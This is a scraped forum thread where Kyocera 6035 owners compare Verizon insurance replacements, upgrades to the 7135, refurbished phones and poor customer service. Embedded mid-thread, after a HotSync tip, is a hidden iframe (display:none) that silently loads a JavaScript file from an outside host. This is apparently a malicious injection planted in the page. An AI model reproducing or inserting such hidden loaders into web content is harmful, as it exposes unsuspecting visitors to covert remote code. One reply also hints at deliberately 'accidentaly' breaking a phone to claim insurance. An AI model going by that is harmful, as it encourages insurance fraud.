I have been complaining about my 6035 to Verizon since July.
"Can You Hear me now?" was the question I had to keep asking everytime I had to call somebody back after a dropped call. dropped almost every call, almost anywhere for no reason. If I had a full signal I would make a call and not even move, dropped call lost signal. I have hade my 6035 for 1 1/2 years loved it. I was so fed up with the dropped calls I was ready to drop the 6035 and just go with a plain cell through a different provider. After making a big issue over it at my local Verizon corperate store they reminded me about my 3.95 insurance plan. They told me since I have an insurance plan I should request a replacement. Okay what do I have to loose so I called. They told my that the 6035 was no longer, and that they would send me and equivalent. I said I would like to stay with the same manufacturer since I had a keyboard for the 6035. They said is it okay if we send you the kyocera 7135. (I tried to respond through my huge grinn) "Is it the same type of phone?" The assured be it is an equivalent. "Okay, if thats what you have to replace it." $35 was my deductible. They said about 3 days. They sent it out Fed Ex overnight priority.
Brand new owner of a 7135 !!!!!!!!!!
Only one beef so far. Car Jack Power plug is smaller. I guess I can deal with that
found out that if you had a 6035 you have to delete the user preferences of the 6035 on your pc before you hot sync. if you hotsync and don't delete the preference file your pc will overrite some of the 7135's options and then you will start to have operation problems after a while.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
sounds like a good deal, but I would suggest to call the ins company and say the phone is broken, to see if they offer the 7135, before you "accidentaly" break the phone. (Incase you didn't already think of that, I just don't want to see your provider give you a 6035, and see anyone out 35.00 and the down time)
How did you find out that Lock/Line was out of 6035's? When I called them (I have a broken screen) they said I had to put in the replacement order and wait for it-- they said they can't tell what stock they have.
I might just fix the fool thing if they are just going to give me a refurbished 6035. I *know* mine works...

When I got mine I called and told them I was having a BIG problem with dropped calls. I wasn't even looking for a new phone. I was actually considering dropping Verizon all together, they offered me a compareable replacement. at the time even if I got a refurb I didn't care, couldn't be any worse than what I had. After They suggested a compareable replacement I asked if they could tell me what the replacement would be and told them I would like to stay with the same manufacturer since I had a lot of accessories for that brand already and would save me the expense in purchasing new ( didn't know at the time that I would have to buy new anyway, and it didn't sound like they knew either) they told me that the replacement would be the 7135. I just said ok, containing my wish to do back flips. I asked if it was the same kind of phone they said its compareable. " The type you had before is no longer in production." I didn't get the feeling that they send refurbs, but they have too otherwise everybody would be asking for replacements. anyway it might just have been luck of the draw or I talked to somebody that did something that they shouldn't or maybe its right and the next comparable phone is really the 7135. I just emphisized to them about my accessories and wanting to stay with kyocera. the phone was send Fed/EX nda.
Thsi conversation was with the insurance company? Not with Verizon?
See, I called the insurance company, they told me that they have no idea what phones they do and don't have and that the only way to find out was by having it sent out.
I told them I really wanted to know because none of the accessories are compatible and I wanted to know what kind of situation I was getting into... and she told me they don't have any of the info, nor could I get it.
They didn't even have a clue that the 6035 was discontinued.

I must have gotten lucky or just spoke to the right person. I forgot I had the insurance and Verizon told me to call and see what they could do for me. I don't believe the info about the replacement phone was on the same screen as she told me to hold on and a few moments later she told me what I was getting. you know as well as I do that you could get a different answer from everybody you talk to. maybe the person you talked to didn't feel like finding out or didn't know that she could, or maybe they changed the way things are done and now its random. again maybe the person I talked to did something she wasn't supposed to, but I didn't suggest the 7135. I asked what the replacement would be and after she told me then I told her why I wanted to know (accessories). maybe the random spinner wheel stopped at the 7135 for me. I would try calling back and explain your situation, maybe talking to somebody else would help.
I emphisized accessories and manufactures. I know you already did but tell somebody else. the person I spoke with was very nice and didn't hesitate on trying to replace the phone to make me happy.
maybe if you tell them you are very unhappy about the customer service at Verizon and what the insurance company does is going to determine whether you stay with VZW or not. maybe that will make them try a little harder to find out.
I love all these success stories, but I'll quickly say I got poked in the rear.
I dropped my 6035 from a cargo pants pocket and the touch screen became insensitive. I've dropped the thing from the top of the car, from ear-height, even kicked it a couple of times before with no problems. This last one sucked.
I took it apart (as usual) and reseated the screen ribbon cables with no change.
I took it to the store and was told I was screwed because it was discontinued, but they offered me $100 off a 7135. I really didn't want to plop all that dough at once, but at the same time I didn't want to buy an old 6035 off ebay either.
The whole ordeal probably has a lot to do with my "region change" fiasco. I recently moved 850 miles from one section of VZW land to another. In this new area, I have to pay EXTRA for an itemized bill. They rearranged my plan to screw me out of minutes, and charged more for the overuse. Repeated complaints have gotten us nowhere. And the new region's web site sucks compared to the old one.
It's a classic dilemma, though. I like the mobile service (it works when I want it to, and I'm a power user) but the customer service blows.
Yeah, I sure didn't get the nice results posted about here when I had 6035 problems!
My 6035 just died off. The PDA portion still worked, but the phone was completely shot. Wouldn't dial out or take a call at all....
I had to pay Verizon $50 for a "second year warranty replacement plan" in order to get them to exchange it for another one. The replacement had a messed up keypad. It only worked when you pushed on the flip in just the right way.
Again, I exchanged for yet another refurbished 6035 - and this one had problems with the display flickering in and out!
Each of these times, I complained that I'd rather just pay a little more for "a better, newer model" (trying to get them to upgrade me to a 7135 somehow) and they wouldn't go for it.
Finally, I just broke down and paid full price for a new 7135 and sold my broken 6035 on eBay at a huge loss.
I think I better buy insurance on this 7135 - because I'm really tired of paying $'s out to Verizon and getting garbage refurb phones in return.
for the $4.00 it costs per month its worth it. I probably wouldn't own a 7135 or be with Verizon anymore if it wasn't for the insurance plan I had with my 6035.
I have insurance with the 6035, and they seem to give me decent working 6035 phones when mine acts up. I'll call them to see if they will give me a 7135 since I have insurance. I did talk to a representative a few days ago and she said that they'd give me $100 off for being a current Verizon user and another $100 off for trading in my 6035. So $500 - 200 = $300 for the 7135. Not bad, but it would be better if I could get a new one through insurance.
Anyone else have success with this. My only concern is that they'd either give me a 6035 that has problems, or a 7135 that has problems. Does anyone know if the phone that you would get from the insurance is a NEW phone, or a refurbished phone?
no more than the usual ones posted here:
